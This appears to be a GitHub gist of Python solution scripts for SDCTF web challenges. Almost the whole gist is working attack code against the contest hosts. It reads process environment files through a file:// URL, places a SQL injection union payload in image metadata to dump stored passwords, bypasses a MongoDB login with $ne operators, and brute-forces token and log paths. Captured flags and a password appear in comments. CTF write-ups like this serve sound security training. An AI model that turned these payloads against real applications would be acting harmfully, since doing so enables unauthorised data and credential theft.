Last active
May 9, 2022 01:55
-
-
Save DauHoangTai/6669efd86c3c484c355eca708a44399b to your computer and use it in GitHub Desktop.
SDCTF web challenge solution
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# python3 CurlUp.py | grep "sdctf" | |
import requests | |
from base64 import b64encode | |
URL = 'https://curl.sdc.tf/read/' | |
for i in range(1,100): | |
payload = b64encode(b'{"url":"file:///proc/%d/environ"}' % i).decode("utf-8") #id=9 | |
r = requests.get(URL+payload) | |
if "sdctf" in r.text: | |
print(r.text) | |
break |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import requests | |
import pyexiv2 | |
URL = 'https://dove.sdc.tf' | |
meta = pyexiv2.ImageMetadata("dove.jpg") #change to your image | |
meta.read() | |
meta['Xmp.dc.description'] = "' union select 1,(select group_concat(password) from employee_accts),3-- -" | |
meta.write() | |
r = requests.post(URL+'/upload', files={'bird': open('dove.jpg', 'rb')}) #change to your image | |
print(r.text) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import requests | |
import sys | |
import random | |
import string | |
URL = 'https://shell.sdc.tf' | |
sess = requests.Session() | |
def ranUser(size=6, chars=string.ascii_uppercase + string.digits): | |
return ''.join(random.choice(chars) for _ in range(size)) | |
def regUser(discord,username,password): | |
data = {"discord":discord,"username":username, "password":password} | |
r = requests.post(URL+'/signup', data=data) | |
def loginAdmin(username,password): | |
data = {"username":username,"password[$ne]":password,"password[length]":"40"} | |
r = sess.post(URL+'/login',data=data) | |
def authenAdmin(): | |
code = input("Enter the code you received: ") | |
data = {"code":code} | |
r = sess.post(URL+'/2fa',data=data) | |
def getFlag(): | |
params = {"shell":"flag-shaped-shell"} | |
r = sess.get(URL+'/buyflagshell', params=params) | |
print(r.text) | |
def main(): | |
if len(sys.argv) > 1: | |
username = ranUser() | |
discord = sys.argv[1] | |
regUser(discord, username, "taidh") | |
loginAdmin("admin","taidh") | |
authenAdmin() | |
getFlag() | |
else: | |
print("python3 HuMongous.py <your_discord>") | |
exit(1) | |
if __name__ == '__main__': | |
main() |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import requests | |
sess = requests.session() | |
URL = 'https://jawt.sdc.tf' | |
flag = '/s/' | |
while True: | |
data = {"username":"AzureDiamond","password":"hunter2"} #In file /js/login.js | |
r = sess.post(URL+'/login',data=data) | |
print(flag) | |
r1 = sess.get(f'{URL}{flag}') | |
flag += r1.text + '/' | |
if '}' in flag: | |
break | |
print(flag.replace('/','')) | |
#sdctf{Th3_m0r3_t0k3ns_the_le55_pr0bl3ms_adf3d} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from datetime import datetime | |
import string | |
import requests | |
import datetime | |
URL = 'https://logs.sdc.tf/logs/' | |
CHECK = ['flag','sdctf','password','pass','passwd','admin'] | |
for year in range(2016,2023): | |
for month in range(1,13): | |
for day in range(1,32): | |
try: | |
d = datetime.datetime(year,month, day).strftime("%a") | |
path = f'{year}/{month}/{day}/{d}.log' | |
print(URL+path) | |
r = requests.get(URL+path) | |
# print(r.text) | |
for key in CHECK: | |
if key.capitalize() in r.text or key.upper() in r.text: | |
print(r.text) | |
print(URL+path) | |
exit() | |
except Exception as e: | |
print(e) | |
#https://logs.sdc.tf/logs/2018/6/13/Wed.log | |
# nc logger.sdc.tf 1338 | |
#Pass: 82d192aa35a6298997e9456cb3a0b5dd92e4d6411c56af2169bed167b53f38d | |
#sdctf{b3tr4y3d_by_th3_l0gs_8a4dfd} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment